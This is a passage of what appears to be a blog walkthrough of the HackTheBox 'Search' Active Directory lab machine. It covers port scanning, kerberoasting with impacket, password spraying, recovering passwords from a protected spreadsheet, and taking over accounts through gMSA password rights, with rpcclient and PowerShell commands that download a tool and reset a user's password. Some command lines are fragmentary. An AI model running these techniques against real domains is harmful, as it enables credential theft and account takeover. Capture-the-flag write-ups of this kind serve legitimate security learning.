HackTheBox-Search

NMAP

PORT      STATE SERVICE       VERSION            
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-19 09:28:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49699/tcp open unknown
49725/tcp open msrpc Microsoft Windows RPC

PORT 139/445 (SMB)

We can check for null authentication on SMB to see if we can we access any shares

PORT 80 (HTTP)

On IIS server we can see a template being used

Foothold

We have a service account web_svc , let's try to do kerberoasting as we have a valid set of credentials so we can request for a TGS for this account or just a provide the username list maybe we can get other account’s hashes too , so using impacket's GetUserSPNS

python3 /opt/impacket/examples/GetUserSPNs.py  -target-domain search.htb -request -dc-ip 10.129.247.201 -usersfile new_users.txt search.htb/hope.sharp
python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.247.201 search.htb/hope.sharp
:"IsolationIsKey?" -outputfile hashes.kerberoast

Privilege Escalate (Edgar.Jacobs)

Still we have access to smb , we still have a lot usernames so we can try to perform a password spray through kerbrute

Privilege Escalation (Sierra.Frye)

Opening the xlsx document ,we can see two worksheets, the first one just shows the statistics of how many passwords were captured and the other sheet shows the usernames with passwords but that worksheet is password protected and have the rows or columns hidden , so they are two ways to read the passwords in this scenario.

</sheetData><sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Privilege Escalation (Tristan.Davies -> Administrator)

This user is a member of ITSEC group which has ReadGMSAPassword rights to an account BIR-ADFS-GMSA , GMSA means Group Managed Service Accounts , in active directory it's a hassle to change change service accounts passwords so this gmsa account is responsible for service accounts passwords and it's hash isn't easy to crack as it's randomly generated

Method 1 (un-intended)

Winrm was completely disabled on this machine , and it was disabled after almost 50 users rooted this machine , winrm wasn’t supposed to be running on the machine (at least what they told in the discord ) , so having functionality of getting a remote session we can just simply login as the account who has genericall , meaning that we can do anything with that user account , so simply changing the password was possible net user username password

Method 2 (intended)

Since winrm was disabled , and there wasn’t any way to get a shell and change the password through net user another way was that since rpcclient allows pass the hash , we can login with the BIR-ADFS-GMSA with his password hash and change the password with this command

setuserinfo2 Tristan.Davies 23 'arzismol'

Method 3

Going into Sierra.Frye's directory through smb share RedirectedFolders$ we can see a file in Downloads\Backups\

Invoke-WebRequest -Uri http://ip/dsinterals.zip -UseBasicParsing -OutFile
Expand-Archive -Path dsinternals.zip -DestinationPath dsinternals
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties PrincipalsAllowedToRetrieveManagedPassword
$Credential = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA$,$pt.SecureCurrentPassword
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { whoami}
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { net user Tristan.Davies arzissmol }

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store